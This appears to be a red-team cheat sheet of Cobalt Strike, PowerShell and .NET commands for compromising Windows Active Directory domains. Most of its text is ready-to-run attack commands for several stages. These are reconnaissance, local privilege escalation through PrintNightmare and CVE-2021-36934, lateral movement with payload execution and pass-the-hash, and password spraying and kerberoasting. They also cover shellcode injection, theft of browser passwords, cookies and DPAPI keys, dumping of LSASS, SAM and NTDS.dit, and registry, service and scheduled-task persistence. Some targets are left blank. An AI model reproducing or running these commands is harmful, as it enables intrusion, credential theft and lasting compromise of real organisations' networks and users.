Running PowerView and SharpView
# PowerView:
powershell-import --> Select PowerView.ps1 to import PS1 file in memory
powershell Get-Module PowerView
powershell Get-NetUser -Identity testuser -Domain
# SharpView
execute-assembly C:\SharpView.exe Invoke-CheckLocalAdminAccess --> Check servers for local admin using current privileges
Running ActiveDirectory module
powershell import --> Select \ADModule\Microsoft.ActiveDirectory.Management.dll file from
powershell Get-ADDomainController -Domain
Running Sharphound (.NET version of Bloodhound) for AD domain collection
# Running SharpView in memory (.NET version of PowerView)
execute-assembly C:\SharpHound.exe --CollectionMethod All --Domain --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\users\testuser\appdata\local\temp\
# Collecting only user sessions to determine who is logged in and where:
execute-assembly C:\SharpHound.exe --CollectionMethod Session,LoggedOn --Outputdirectory C:\temp\
# Collection methods reference:
AD Recon tool - Perform different collection methods (ACLs, OUs, DCs, etc.) and output to Excel files
powershell-import --> ADRecon.ps1
# Perform all collection methods:
powershell ADRecon -OutputDir .\ -DomainController
PowerUp - PowerSploit module
powershell-import --> PowerUp.ps1
powerpick Invoke-AllChecks | Out-File -Encoding ASCII PowerUp-checks.txt
SharpUp - .NET port of PowerUp
# Run all checks automatically - output to console
execute-assembly C:\SharpUp.exe
SeatBelt - .NET tool by GhostPack
GREAT tool to query a local system to gather system/user/remote/misc data Can be used as Admin or normal-privileged user
# Run ALL checks - returns TONS of data
execute-assembly C:\SeatBelt.exe -group=all -full -outputfile="C:\Temp\SeatBelt-all.json"
# Run only user-related checks - returns things like Chrome data, DPAPI keys, IE tabs, Windows vault/credentials, etc.
execute-assembly C:\SeatBelt.exe -group=user -outputfile="C:\Temp\SeatBelt-user.json"
# Run only system-related checks - returns things like Antivirus, Applocker, env path/variables, local users/groups, WMI, sysmon, UAC, etc.
execute-assembly C:\SeatBelt.exe -group=system -outputfile="C:\Temp\SeatBelt-system.json"
# Run only Chrome checks - returns bookmarks, history, presence
execute-assembly C:\SeatBelt.exe -group=chromium -outputfile="C:\Temp\SeatBelt-chrome.json"
# Run only remote-related checks - returns things like network shares, putty sessions, RDP connections/settings, Filezilla, Windows firewall, etc.
execute-assembly C:\SeatBelt.exe -group=remote -outputfile="C:\Temp\SeatBelt-remote.json"
# Run only miscellaneous-related checks - returns things like Chrome data, logon events, LOBAS, interesting files, downloads, PS events, scheduled tasks, etc.
execute-assembly C:\SeatBelt.exe -group=misc -outputfile="C:\Temp\SeatBelt-misc.json"
# Peroform all checks and output to console
# Supports:
Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004
Server 2016 & 2019
execute-assembly C:\Watson.exe
# Impacket's PrintNightmare:
# Impacket's SharpNightmare (Csharp):
# PowerShell PrintNightmare local priv esc:
# Local priv esc
execute-assembly C:\SharpPrintNightmare.exe C:\addCube.dll
# RCE using existing context
execute-assembly C:\SharpPrintNightmare.exe '\\\smb\addCube.dll' '\\'
# RCE using runas /netonly
execute-assembly C:\SharpPrintNightmare.exe '\\\smb\addCube.dll' '\\' hackit.local domain_user Pass123
Exploit in Windows 10 and 11 which allows you to read the SAM, SYSTEM and SECURITY hives as a low-privileged user
# First check privileges to read SAM hive
run icacls C:\Windows\System32\config\SAM
--> If the results show success and the group BUILTIN\Users has privileges (I)(RX) then the SAM file should be readable by all users!
# Exploit: Csharp implementation [HERE](
execute-assembly C:\CVE-2021-36934.exe
--> Dumps hashes to console upon successful exploitation
Cobalt Strike jumping
# Jump using WinRM if it's enabled for the current user on the target system
jump winrm64 HTTPSLISTENER
# Jump using PsExec if it's enabled for the current user on the target system
jump psexec64 HTTPSLISTENER
Cobalt Strike remote-exec - Executes commands on a target system using psexec, winrm or wmi
# remote-exec using WMI
remote-exec wmi cmd.exe /c "C:\Users\Public\payload.exe"
# remote-exec using PsExec
remote-exec psexec cmd.exe /c "C:\Users\Public\payload.exe"
Enable Powershell Remoting manually
# Enable on local system with Admin privileges
powershell Enable-PSRemoting –Force
# Enable on remote system
make_token AD\admin Password123! --> Token with Admin privileges on remote system is required
run psexec.exe \\ -h -s powershell.exe Enable-PSRemoting -Force
# Test remote access
powershell Invoke-Command -ComputerName TestComputer -ScriptBlock { whoami; hostname }
RACE.ps1: ACL attacks for lateral movement, persistence and privilege escalation Stealthier than above method since it doesn't touch disk
powershell-import --> RACE.ps1
make_token AD\Admin password --> This tool requires Admin privileges on the remote system being targeted
powershell Set-RemotePSRemoting -SamAccountName testuser -ComputerName --> Force enable PS remoting for the specific user
powershell Set-RemoteWMI -SamAccountName testuser -Computername --> (Optional) Force enable WMI for the specific user
# Now we can move laterally in CS with WinRM for the specified user
make_token AD\testuser password
jump [winrm/winrm64] HTTPSLISTENER
Invoke-TheHash - PS tools to perform SMB and WMI pass-the-hash attacks
powerpick Invoke-WMIExec -Target -Domain -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose
powerpick Invoke-SMBExec -Target -Domain -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose
Over-pass-the-hash with Rubeus Inject a ticket into memory using known credentials and then move to a system that user has access to
# Revert to original token in CS
# Inject new ticket into memory
execute-assembly C:\Rubeus.exe asktgt / /user:admin1 /rc4:<NTLM hash> /ptt
# Run network commands as that user
jump winrm64
Move Kit Aggressor script using execute-assembly, SharpMove and SharpRPD assemblies for doing lateral movement with various techniques
Get-GPPPassword.ps1 PowerSploit module
# Get-GPPPassword Searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords
powershell-import --> Get-GPPPassword.ps1
powerpick Get-GPPPassword -Server
Net-GPPPassword .NET port of get-gpppassword
execute-assembly C:\Net-GPPPassword.exe
Get-GPPAutologon.ps1 PowerSploit module
# Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password
powershell-import --> Get-GPPAutologon.ps1
powerpick Get-GPPAutolgon
powershell-import --> DomainPasswordSpray.ps1
# Get the full domain user list (Optional)
powershell Get-DomainUserList -Domain -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
# Password spray from a username and password list
powershell Invoke-DomainPasswordSpray -UserList userlist.txt -PasswordList passlist.txt -Domain -OutFile sprayed-creds.txt
# Auto spray a specific password on an auto-generated user list (very noisy)
powershell Invoke-DomainPasswordSpray -Password Summer2021
Rubeus brute-force password spraying a single password or using a password file
execute-assembbly C:\Rubeus.exe brute /password:Password123! / /noticket /outfile:passes-sprayed.txt [/passwords:PASSWORDS_FILE>] [/user:USER | /users:USERS_FILE] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/dc:DOMAIN_CONTROLLER] [/verbose] [/nowrap]
SharpSpray - .NET port of PowerSpray.ps1
# By default it will automatically generate a user list from the domain using LDAP
# Sleeps 30 minutes between each password cycle, delays 300 milliseconds between each password guess attempt
execute-assembly C:\SharpSpray.exe --Passwords Summer2021,Fall2021 --Sleep 30 --Delay 300
PowerView kerberoasting (Outdated and still reliant on PowerShell)
# Get users with SPN set
powershell Get-DomainUesr -SPN
# Kerberoast all users
powershell Invoke-Kerberoast - OutputFormat hashcat | fl
# Kerberoast specific user
powershell Invoke-Kerberoast -Identity testaccount -Domain -OutputFormat hashcat | fl
Rubeus kerberoasting
# Kerberoast all users
execute-assembly C:\Rubeus.exe kerberoast /outfile:KerbHashes.txt /
# Kerberoast specific user
execute-assembly C:\Rubeus.exe kerberoast /outfile:KerbHash.txt /user:testaccount /
Several methods here within Cobalt Strike or using BOFs
# Spawn a beacon into an existing process
inject <PID> <x86|x64> HTTPSLISTENER
# Inject raw shellcode into an existing process
# Create shellcode: Cobbalt Strike --> Attacks --> Packages --> Windows Executable (S) --> Output = Raw --> Creates "beacon.bin" file
shinect <PID> <x86|x64> C:\beacon.bin
# Shellcode injection using Windows syscalls with [BOF script](
syscalls_shinject <PIX> C:\beacon.bin
# SharpDPAPI to retrieve domain DPAPI backup key and output to file which is used for subsequent attacks (requires DA privileges)
execute-assembly C:\SharpDPAPI.exe backupkey /file:key.pvk
# Decrypt any RDG (remote desktop) passwords found using the domain backup key (can also use local Admin account or master key)
execute-assembly C:\SharpDPAPI.exe rdg /pvk:key.pvk /unprotect
# Decrypt any KeePass passwords found using the domain backup key (can also use local Admin account or master key)
execute-assembly C:\SharpDPAPI.exe keepass /pvk:key.pvk /unprotect
SharpChrome to extract and decrypt a user's Chrome sessions/passwords
# Dumping Chrome login passwords on remote machines using the domain backup key (can also use local user password)
execute-assembly C:\SharpChrome.exe logins /pvk:key.pvk /
# Dumping and decryptiong Chrome user cookies and sessions on remote machines using the domain backup key (can also use local user password)
# Cookies can then be imported into Chrome/Firefox using the extension Cookie-Editor
execute-assembly C:\SharpChrome.exe cookies /pvk:key.pvk / /format:json
SharpWeb - Retrieve saved credentials in Chrome, Firefox and Edge
# Retrive all saved browser credentials
execute-assembly C:\SharpWeb.exe all
# Enumerate and abuse misconfigurations in AD CS
# Find vulnerable certificates with Certify.exe
execute-assembly C:\Certify.exe find /vulnerable /
# Request a new certificate for a vulnerable template from the above output
execute-assembly C:\Certify.exe request /\ops-dc01 /template:VulnTemplate /altname:DomainAdminUser1
# Copy the certificate private key from the above output to a file, then request a TGT using the certificate file with Rubeus.exe
execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminUser1 /certificate:C:\Temp\cert.pfx /
Mimikatz built-in to dump passwords/hashes to console
# Works against most updated systems with AV/EDR if running as SYSTEM
Dumping LSASS with ProcDump.exe (requires touching disk) (NOTE: Might get flagged by AV and raise alerts but will often still output dump file)
upload --> ProcDump.exe
run ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
Dumping LSASS with from PowerSploit without touching disk
powershell Get-Process | Out-Minidump -DumpFilePath C:\temp
Extract LSASS process with SafetyKatz
execute-assembly C:\SafetyKatz.exe --> Dumps LSASS process to .dmp file on the local system
Extracting passwords/hashes offline from LSASS dump using Mimikatz (ON YOUR OWN SYSTEM!)
mimikatz.exe log "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords /all" "sekurlsa::wdigest" exit (Run on your local box)
SAM dump built in - Injects into LSASS to dump local SAM database hashes to console
run reg.exe save HKLM\sam
run reg.exe save HKLM\security
run reg.exe save HKLM\system
# Download SAM files then dump hahses offline using
python -sam -security -system LOCAL (Run on your local box)
SharpSecDump SAM and LSA extraction
Remotely dump SAM and LSA secrets (same functionality as Impacket's
# Runs in the context of the current user
# Local Admin privileges is required on the target machine
execute-assembly C:\SharpSecDump.exe -target= -u=admin -p=Password123 -d=lab.local
Invoke-DCSync.ps1 to perform DCSync attacks remotely
powershell-import --> Invoke-DCSync.ps1
# Perform DC Sync hash dump for all users in the target domain
powershell Invoke-DCSync -Domain lab.local [-DomainController ops-dc01.lab.local]
# Perform DC Sync hash dump for all users in the specified group
powershell Invoke-DCSync -Domain lab.local -GroupName "Domain Admins" | ft -wrap -autosize
Copy-VSS.ps1 from Nishang toolkit to dump NTDS.dit locally on the DC
powershell-import --> Copy-VSS.ps1
powerpick Copy-VSS -DestinationDir C:\temp
NTDSutil.exe to dump NTDS.dit locally on a Domain Controller
run ntdsutil.exe activate instance ntds,ifm,create full C:\ntdsutil,quit,quit | ntdsutil
SharpStay - .NET Persistence
# Scheduled task persistence
execute-assembly C:\Sharpstay.exe action=ScheduledTask taskname=TestTask command="C:\windows\temp\file.exe" runasuser=testuser triggertype=logon author=Microsoft Corp. description="Test Task" logonuser=testuser
# Service creation persistence
execute-assembly C:\Sharpstay.exe action=CreateService servicename=TestService command="C:\Windows\temp\file.exe"
# User registry key persistence
execute-assembly C:\Sharpstay.exe action=UserRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\file.exe"
# Many other methods available on the tool's github documentation
# List persistence entries
execute-assembly C:\SharPersist.exe -t [reg,schtaskbackdoor,startupfolder,service] -m list
# Registy persistence
execute-assembly C:\SharPersist.exe -t reg -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -k "hkcurun" -v "Test Payload" -m add -o env
# Scheduled task backdoor persistence
execute-assembly C:\SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -n "Test Scheduled Task" -m add -o daily
# Startup folder persistence
execute-assembly C:\SharPersist.exe -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -f "Test File on Startup" -m add
# Windows service persistence
execute-assembly C:\SharPersist.exe -t service -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -n "Test Service" -m add
StayKit - Cobalt Strike persistence kit aggressor script
Cobalt Strike commands cheat sheet
PowerShell remoting cheat sheet